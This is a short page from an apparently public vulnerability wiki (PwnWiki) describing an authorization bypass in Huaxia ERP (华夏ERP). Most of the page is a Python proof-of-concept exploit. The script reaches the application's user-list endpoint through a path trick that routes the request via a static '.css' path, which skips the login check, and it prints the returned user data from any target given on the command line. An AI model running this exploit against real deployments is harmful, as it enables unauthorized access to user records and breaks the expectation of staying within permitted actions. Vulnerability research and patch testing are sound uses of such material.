◆◆0

华夏ERP授权绕过漏洞

免费、自由、人人可编辑的漏洞库

,

POC

python3 poc.py http://ip:port

import sys,requests
def main(ip):
    url = "{ip}/a.css/../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D&currentPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv1)
'''

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

返回顶部